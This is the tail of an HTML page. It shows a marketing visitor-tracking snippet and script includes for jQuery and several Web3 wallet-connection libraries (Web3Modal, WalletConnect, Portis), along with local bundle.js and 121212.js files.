        a[a.visitorGlobalObjectAlias].l = (new Date).getTime();
        b = d.createElement("script");
        b.src = e;
        b.async = !0;
        c = d.getElementsByTagName("script")[0];
        c.parentNode.insertBefore(b, c)
      })(window, document, "https://diffuser-cdn.app-us1.com/diffuser/diffuser.js", "vgo");
      vgo("setAccount", "91470544");
      vgo("setTrackByDefault", !0);
      vgo("process");
    </script>
    <script
    src="https://code.jquery.com/jquery-3.6.0.min.js"
    integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
    crossorigin="anonymous"></script>
      <script type="text/javascript" src="./WEB3/web3.js"></script>
      <script type="text/javascript" src="./Web3Modal/web3modal.js"></script>
      <script type="text/javascript" src="./bundle.js"></script>
      <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
       <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider"></script>
       <script type="text/javascript"  src="https://cdn.jsdelivr.net/npm/@portis/web3@4.0.7/umd/index.min.js"></script>
      <script src="./121212.js"></script>

  
</body>
</html>